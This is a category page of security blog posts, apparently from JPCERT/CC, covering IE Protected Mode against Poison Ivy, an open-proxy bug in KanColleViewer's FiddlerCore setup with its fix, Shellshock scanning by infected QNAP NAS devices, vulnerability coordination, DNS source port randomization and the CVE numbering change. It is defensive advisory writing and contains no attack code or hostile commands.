17 posts categorized "#Vulnerabilities" Feed

Jul 01, 2015

Protected Mode in Internet Explorer

Hello, this is Shusei Tomonaga again from the Analysis Center.

JPCERT/CC has been observing cases where vulnerability in Internet Explorer (“IE” hereafter) is leveraged in targeted attacks, etc., resulting in system takeover or configuration change by a third party. In fact, IE has several functions to prevent such exploits. In this article, I will introduce one of the functions called “Protected Mode” – its overview and effects.


“Protected Mode” is a new feature of IE 7 and later, which is enabled by default. This function runs by using an access control mechanism called “Integrity Level” which has been introduced with Windows Vista. Resources (such as files and registry entries) and processes have their own integrity levels (currently High, Medium or Low, but extensible in the future). When accessing, this access control mechanism requires that the integrity level of the accessing process is the same or higher than the resource which will be accessed.

Figure 1: Integrity Level Concept Chart

Ordinary processes started by Command Prompt has a “Medium” integrity level, while IE processes in Protected Mode has a “Low” integrity level. Child processes have the same integrity level or lower integrity levels than their parent processes. As a result, malware deriving from an IE vulnerability will be running as “Low” integrity level, whether it is running as an IE process or its child process. Consequently, malware will have limited access to resources, which is expected to limit its intended behaviour.

Figure 2: Integrity Level of Malware Run by Leveraging IE Vulnerability (Displayed by Process Explorer)


In order to verify how IE Protected Mode is effective in reducing damage by malware infection, we analysed how malware behaviour is limited in such environment. We took Poison Ivy as an example. Table 1 below describes the result of the analysis.

Table 1: Poison Ivy's Attack Vector and Behaviour under Protected Mode
ItemPoison Ivy's Attack VectorBehaviour under Protected Mode
1 Send information of infected computers (host name, IP address, etc.) Capable
2 Create/delete/download files/folders, execute programs Limited
(Only able to create/delete “Low” integrity level files/folders - e.g. “%TEMP%\Low” folder, etc.)
3 Create/modify/delete/view/search registry entries Limited
(Unable to create/modify/delete)
4 Obtain list of running processes, suspend processes Capable
5 Obtain list of installed applications Capable
6 Window-related commands
(Obtain information/image, key input, display, hide, maximise, minimise)
7 Screen capture Capable
8 Execute arbitrary shell commands Limited
(Executable on “Low” integrity level)

As shown in Items 2 and 3 in the table, malware can neither create files in Startup folders nor create registry entries, therefore it cannot set up the necessary configuration for auto-run. Consequently, the process of malware disappears upon system shutdown, and will not persistently run on the computer. Other than that, however, other malware functions which could lead to information leakage (e.g. sending information of the infected computer, obtaining screen captures, etc.) cannot be blocked even under Protected Mode. This is because the operations restricted by integrity levels are configured for each resource as access policy, and it does not restrict all the operations (write/read/execute). Table 2 below shows items which can be configured as access policy.

Table 2: Configurable Items in Access Policy
No-Write-Up Rejects writing from lower integrity level(s)
No-Read-Up Rejects reading from lower integrity level(s)
No-Execute-Up Rejects execution from lower integrity level(s)

For example, a text (.txt) file created by Notepad in a document folder has a “Medium” integrity level and only a “No-Write-Up” access policy by default. Therefore, if malware running with “Low” integrity level attempts to write on this file, it fails. However, since it does not have a “No-Read-Up” policy, it can read files – hence information leakage cannot be prevented.

Figure 3: File Access Policy (Displayed by AccessChk)


Protected Mode can save the risk of malware from persistently running even after reboot. However, the above analysis clearly indicates that this is not robust enough against information theft.

In fact, IE has a stronger security feature called “Enhanced Protected Mode”, which is expected to prevent further damage. In the coming entry, I will introduce this enhanced feature.

Thank you for reading and see you soon.

- Shusei Tomonaga


[1] Understanding and Working in Protected Mode Internet Explorer


May 28, 2015

Fiddler Core's insecure Default flag may lead to Open Proxy Issue

NOTE: This article, originally published on May 28, 2015, was updated as of June 8, 2015 (See below).

Just 2 days ago, we published an advisory (in Japanese) on an open proxy issue of a widely used, open source, web browser game utility app called KanColleViewer. The game, Kantai Collection, has explosive popularity. Its official Twitter account has over 1 million followers, and according to its Tweet, the game has 3 million registered players as of May 2015. The issue was due to the insecure configuration of a proxy server launched in the app, allowing any Internet user to access the proxy. Due to the large user base of the app and the nature of the issue, Internet-wide scan against 37564/TCP (the app's proxy port) has been observed.

In this article, I will elaborate a bit more on the technical aspect of the issue to provide secure coding tips for developers.

KanColleViewer is a Windows Desktop app written in C# WPF. The app uses IE shell for web browsing and Fiddler Core for capturing HTTPS traffic between the client and the game server. The app was designed to improve the UI experience of the game, thus acquiring larger user base (2 million downloads as of August 2014, says the developer).

Fiddler Core is a .Net class library for C# apps. By using this library, developers can launch a web proxy in their apps, capture and modify HTTP/HTTPS traffic just like using Fiddler, a well-known web debugging proxy tool.

Now, who is going to use the web proxy launched in the app?

Because the app only needs to capture its user's (game player’s) traffic, the proxy should be exclusively used by the user. However, the proxy was launched in a way that is accessible from remote users as well, serving as an "Open Proxy".

If you take a look at the source code of the vulnerable version 3.8.1, the proxy was launched by calling FiddlerApplication.Startup() in the following way:

63  public void Startup(int proxy = 37564)
64  {
65      FiddlerApplication.Startup(proxy, false, true);
66      FiddlerApplication.BeforeRequest += this.SetUpstreamProxyHandler;
68      SetIESettings("localhost:" + proxy);
70      this.compositeDisposable.Add(this.connectableSessionSource.Connect());
71      this.compositeDisposable.Add(this.apiSource.Connect());
72  }

FiddlerApplication.Startup() is an overloaded method. There are three implementations where two, three and four arguments are taken. Those that take three and four arguments are NOT RECOMMENDED to be used according to the FiddlerCore documentation (which you can download from http://www.telerik.com/fiddler/fiddlercore).

Now, the recommended way to start the proxy instance of FiddlerCore is by calling the following two-argument version of the Startup():

public static void Startup(
       int iListenPort,
       FiddlerCoreStartupFlags oFlags

The first argument is the port number of the proxy. The second argument is the flag options passed into the Startup method.

How should we specify the flag? According to the documentation, using the 'Default' is recommended as below:

The FiddlerCoreStartupFlags option you want to set;

FiddlerCoreStartupFlags.Default is recommended

Unfortunately, the 'Default' flag is NOT SAFE. It will open the door for 'Open Proxy'.

If you use FiddlerCoreStartupFlags.Default, your app will start listening at I used the FiddlerCoreAPI SampleApp (which comes with the free download of FiddlerCore) for testing purposes and got the following result:


The 'Default' flag will enable 'AllowRemoteClients' option which may not be what you exactly want.


Going back to KanColleViewer, the issue was fixed in version 3.8.2. The app now calls Startup() method in a safer way:

63  public void Startup(int proxy = 37564)
64  {
65      FiddlerApplication.Startup(proxy, FiddlerCoreStartupFlags.ChainToUpstreamGateway);

'ChainToUpstreamGateway' option will instruct FiddlerCore to use the system proxy as an upstream gateway proxy.

It seems that there are a number of websites that show the insecure call of the Startup(). I briefly searched stackoverflow.com with the keyword 'FiddlerApplication.Startup' to find enough examples that may lead to this issue.

So tips for developers:

  • Use the two-argument Startup() method
  • Don't use FiddlerCoreStartupFlags.Default
  • Instead, specify the options you really need

Lastly, I'd like to thank the developer Mr. Manato KAMEYA for coordinating with JPCERT/CC smoothly and disclosing the security issue in a responsible manner.

Masaki Kubo @ Vulnerability Analysis Team

Update on June 8, 2015

After a few discussions with the developer of FiddlerCore@Telerik, they've decided to exclude AllowRemoteClients from the Default flag in their next release:

... out of an abundance of caution we will be making a breaking change to the next build of FiddlerCore to require developers explicitly opt-in to Allowing Remote clients.(http://www.telerik.com/forums/fiddlercorestartupflags-default-enables-allowremoteclients#1xtYFqA1LUqoNGXx-h6aKw)

I appreciate Telerik for the decision to make developers and their users more secure.

Dec 25, 2014

Increase in Possible Scan Activity from NAS Devices

Happy holidays to all, this is Tetsuya from Watch and Warning Group. Today, I would like to share a recent, remarkable trend discovered through TSUBAME sensors.


In TSUBAME, we have observed a significant increase in packets destined to 8080/TCP since December 5th, 2014. When accessing source IP addresses using a web browser, the admin login screen for NAS devices provided by QNAP was seen in many cases for IP addresses from certain regions.


[Figure 1: Scan count per hour observed at 8080/TCP from December 2nd, 2014 onwards (Source: TSUBAME)]


Below are some characteristics that we noticed from TSUBAME data:

  - Increase in packets to Port 8080/TCP since December 5th, 2014

  - The TTL value for most of the packets were between 30 - 59

  - A scan attempt sends 1 - 2 packets (the second packet is a re-send)

  - A source IP does not continuously scan a particular destination IP (The majority scans only once)



Also we were able to verify the following after checking some of the source IP addresses:

  - When accessing Port 80/TCP of the source address, a redirect to Port 8080/TCP occurs and the admin login screen of QNAP NAS is shown

  - The QNAP firmware looks to be version 4.1.0 or earlier (Information taken from the screen that is shown. 4.1.0 and earlier are affected by Shellshock) (*1)


Using an environment separate from TSUBAME to check the packets sent by an infected QNAP device, we saw the following request (there are several types of requests).


[Figure 2: Sample request from infected device (Source: JPCERT/CC)]


When a QNAP NAS device using a vulnerable version of firmware receives this request, the Shellshock vulnerability is leveraged to download a malicious attack program over the Internet and be infected by malware (*2, *3). Once infected, it begins to search for other vulnerable NAS devices. As a result of this activity, a large number of NAS devices were infected and we believe this is the reason for the sudden increase in packets to 8080/TCP.


The vendor has released firmware to address the Shellshock vulnerability. If you have yet to apply the update, we recommend that you first check (*2) whether you have been infected or not.


  JVN#55667175 QNAP QTS vulnerable to OS command injection (*1)



  The Shellshock Aftershock for NAS Administrators (*2)



  Worm Backdoors and Secures QNAP Network Storage Devices (*3)



 An Urgent Fix on the Reported Infection of a Variant of GNU Bash Environment Variable Command Injection Vulnerability (*4)



Thank you for reading, and we wish you all the best for the coming year.


- Tetsuya Mizuno

Dec 11, 2014

Year in Review - Vulnerability Handling and Changing with the Times

Hello and Happy Holiday Season to everybody.

Taki again, and today I will write about some experiences in product (software, hardware) vulnerability coordination this year.


 - Introduction -

A lot happened this year and I do not have the time to go through everything, but would like to go over some of the major issues that we handled and for those that are not familiar, provide a very brief overview of our coordination activities.

Before I move on, our vulnerability advisories are published at Japan Vulnerability Notes (JVN). Other CSIRTs across the globe have their own sites like this, such as CERT/CC and NCSC-FI. While CERT/CC publishes quite a few advisories each year, NCSC-FI only publishes several high-profile issues each year that affect a large number of users.

The number of published advisories on JVN is shown below.



[Figure 1 - Number of product vulnerability-related advisories published on JVN per quarter since the 2nd quarter of 2011 (Source: JPCERT/CC)]


What can be seen on JVN are advisories for vulnerabilities in products, which directs users to fixes, updates, patches, etc. for products in use. However, what is seen here is merely a small portion of the work that is involved in our vulnerability handling activities.

We coordinate the disclosure of product vulnerabilities with developers, researchers so that they do not become 0-days, where information about a vulnerability is disclosed without a way for the user to resolve it. Some of you may have heard the phrase "Coordinated Disclosure," which is what we attempt to do.


 - This Year -

This past year, we were involved in a few high profile cases which even received media attention.

 One of these issues was the so-called "Heartbleed" vulnerability in OpenSSL. There are quite a few articles on the web that describe the disclosure timeline, so I will not get into those details here. As an aside, here is a previous entry that describes how Japanese organizations dealt with Heartbleed.

We received information on this issue a few days prior to disclosure from one of our global counterparts. As we were about to begin the coordination process with developers the issue was disclosed by the OpenSSL team.

This case taught us (again!) that while reports may be sent to us in a confidential manner, this does not mean that we are the only ones that have this information.


[Figure 2 - Sample image of vulnerability handling information flow during a coordination effort (What a mess!) (Source: JPCERT/CC)]

This is especially true in cases that involve open-sourced software. There were quite a few high-profile advisories involving OpenSSL this year (CCS Injection, POODLE attack, etc.) which eventually led to the OpenSSL team releasing a new security policy  related to addressing vulnerabilities.

 Pre-disclosure, or notification prior to public disclosure for such open source products have been done through mailing lists or sending separate e-mails to relevant parties. Now most major open source projects only pre-disclose with certain groups of developers that need fixes first and then the rest of the world gets to know about the issue at the same time. This is also true with software provided by the Internet Systems Consortium (ISC), such as BIND.

- The next step in vulnerability handling -

The experiences that I had over this past year have shown me that not only are more and more people looking for vulnerabilities, but this information is moving around at such high speeds to a variety of parties, where in some cases, have no idea that another particular group has that information.

In general, the fewer parties involved in a coordination effort, the better. Not only does this reduce the probability that the information gets disclosed prematurely, but it also provides the developer better control as to how this non-public vulnerability information is being handled.

As a coordination center, we serve as the intermediary between the reporter and developer. If a reporter can report and communicate with the developer directly, then I believe they should do so. Our involvement in such a case is not necessary and in fact is a loss of time since each communication has to go through an additional party.

However for cases involving open sourced software that is implemented in various products, further coordination becomes necessary and this is where we can (and have been able to) provide value in a coordination effort.

Vulnerability handling has been evolving from a series of one-to-one communications to where various parties (that are often not in contact with each other) are involved in a single case at the same time. Hopefully we can continue to evolve with the times so that we can provide maximum value to a vulnerability coordination effort so that the proper information is being sent to relevant parties.

I wish everybody a safe and wonderful holiday season!

Takayuki (Taki) Uchiyama

Apr 18, 2014

Source Port Randomization for Caching DNS Servers Requested, yet again.

Hello, this is Moto Kawasaki, a new member of Global Coordination Division.


Alerts from JPRS and JPCERT/CC

On April 14th 2014, JPRS (Japan Registry Services Co., Ltd.) and JPCERT/CC concurrently published the alerts on DNS cache poisoning attack.


     Alert from JPRS

     http://jprs.jp/tech/security/2014-04-15-portrandomization.html (Japanese version)


     Alert from JPCERT/CC

     https://www.jpcert.or.jp/english/at/2014/at140016.html (English version)

     https://www.jpcert.or.jp/at/2014/at140016.html (Japanese version)


Now I'd like to elaborate on the key points and share my views on the case by reading between the lines of these alerts.


The effect of Source port randomization against cache poisoning

According to the alert issued by JPRS, they made a request for DNS server administrators to randomize the UDP source port number from which caching DNS servers send out query packets as a mitigation against cache poisoning attacks.


Cache poisoning attack is a long-lasting threat on caching DNS servers, injecting arbitrary entry and diverting users to malicious web sites, mail servers, and so forth.

Dan Kaminsky disclosed, in 2008, his method to attack disabled TTL (Time-To-Live) protection by using "not cached data" as query name. This news astonished people because it enabled continuous attack, in fact, from “once in several hours” to “almost anytime”.


On the other hand, source port randomization is considered as the first-choice and mandatory mitigation. Because it increases difficulty for attackers to predict to which port in the range of randomized source port they should send malicious packets, source port randomization reduces the probability of successful attack by one over a few ten-thousands. This is the reason why JPRS recommends source port randomization.


But why did we re-emphasize the risk of cache poisoning attack and importance of source port randomization? JPRS described in their alert by referring to the two recent findings.

One is that JPRS had been informed by large ISPs in Japan that they are observing the increase of cache poisoning attacks with Kaminsky's method.

The other is that JPRS found that approximately 10% of source IP addresses, among the senders of DNS query to JP DNS Servers, did NOT randomize their source port yet.

JPRS kindly supplied a graph (Figure 1) which describes the proportion of the source port randomization observed. We can find several cliffs, swells and overall decline tendency. One of the cliffs might be the aftereffects of Kaminsky’s presentation or from the release of DNS software with randomized source port by default. And at last, 10% of the IP addresses still send queries from static (fixed) or limited (predictable) source ports.


Figure 1 Transition of source port randomization status (Apr-2006 to Apr-2014) by JPRS. 

Trasition_of_source_port_randamizatSource: JPRS (http://jprs.jp/tech/security/2014-04-15-portrandomization-status-e.pdf))


These findings imply, I think, a large number of caching DNS servers are still vulnerable to cache poisoning. This can escalate into domain name hijacking, etc. for the users of such caching DNS servers.


Our gratitude and action in the near future

Based on the list of vulnerable caching DNS servers provided by JPRS, JPCERT/CC is going to notify administrators to fix their setting. And it is our great pleasure to cooperate with other parties, just like we did with JPRS for handling this case.


Finally, I hope this blog entry will help address the issue and make the world of randomized source port :-)


Thank you.

Moto Kawasaki

Jul 09, 2013

The votes are in - and we have a new CVE numbering scheme!

[Update 2013.8.1]
MITRE has prepared a page describing the change in CVE format.
The page is at the following:

   CVE-ID Syntax Change

Stated on the site, this change is scheduled to take effect on January 1, 2014. This page describes some of the background behind the change and towards the bottom of the page there is a list of some frequently asked questions.

Hello, this is Taki again and this is an update to a previous entry that I wrote on CVE identifiers.

For details on what CVE is, please refer to my previous entry or the CVE website.

As I wrote in my previous entry, CVE is undergoing a numbering scheme change and the editorial board voting has been completed.

After 2 rounds of voting, Option B was elected to be the new numbering scheme.
To review, Option B is as follows:

(Directly from the above link)
To reprise, Option B specifies the following:

- Variable length
- 4-digit Year + four fixed digits for IDs up to 9999
- IDs 0001 through 0999 padded with leading zeros
- IDs over 9999 will expand as needed, no leading zeros


- Four digit IDS (through 9999)
    - CVE-2014-0001, CVE-2014-0999
    - CVE-2014-1234, CVE-2014-9999

- Five digit IDS (> 9999)
    - CVE-2014-10000, CVE-2014-54321, CVE-2014-99999

- Six digit IDS (> 99999)
    - CVE-2014-100000, CVE-2014-123456, CVE-2014-999999

- Etc., as needed
According to MITRE, this new scheme will become effective January 1, 2014.

Transition plans and other specifics will become available as time goes on.
If there are any developments, I will notify via this blog.

For any questions, please contact me at vultures(at)jpcert.co.jp

- Taki Uchiyama

Continue reading »

Feb 13, 2013

CVE is about to undergo a change in syntax for CVE identifiers

Hello, it's Taki here and it has been a long time since I last wrote here.

Today's topic is about the following:

Call for Public Feedback on Upcoming CVE ID Syntax Change

Before I get into the details of what is said here, I would like to quickly introduce CVE. CVE stands for Common Vulnerabilities and Exposures and it is managed by The MITRE Corporation in the US. CVE identifiers are unique, common identifiers for publicly known information security vulnerabilities. For more details on CVE identifiers, please refer to the following:

About CVE Identifiers

So getting back to the discussion topic, CVE is about to undergo a change in the syntax for CVE identifiers. The current syntax, CVE-YYYY-NNNN can only support a maximum of 9,999 unique identifiers for a given year.

There are many users of CVE across the globe and a syntax change may affect a number of users, thus the CVE project is soliciting feedback prior to changing the syntax.

There are 3 choices to choose from, and I will list them in my order of preference with some reasoning behind its placement. (For details on the exact syntax for each option, please refer to the MITRE announcement)

1. Option A
This requires the least change, and I expect users that are already familiar with the current CVE syntax should be able to make the transition without too many issues. Being a little selfish, since this option requires the least change, it would make it easier to explain the differences to newer users of CVE and why they were made.

2. Option C
This is quite a drastic change from the current syntax but with the inclusion of the check digit, it would allow users to verify that the CVE identifier is a valid one. However, this syntax may be a little difficult to handle for product developers that incorporate CVE identifiers into their products.

3. Option B
I went back and forth a little between Options B and C. But the check digit that allows for validation (albeit a simple method) made the choice for me. In my opinion, it would be hard to determine whether that ID is a valid one since the number of digits would be arbitrary.

JPCERT/CC has been working with MITRE since 2008 to have CVEs issued for advisories on Japan Vulnerability Notes (JVN). Since then, JVN has become CVE compatible and JPCERT/CC has become a CVE Numbering Authority (CNA). As a member of the vulnerability handling team, I have listed my opinions here and would certainly welcome any feedback or discussion.

As mentioned on the MITRE announcement, there is a mailing list for discussions as well.

Any questions should be directed to the mailing list, but if you would like to have a discussion offline, please feel free to contact me at vultures(at)jpcert.or.jp.

- Taki Uchiyama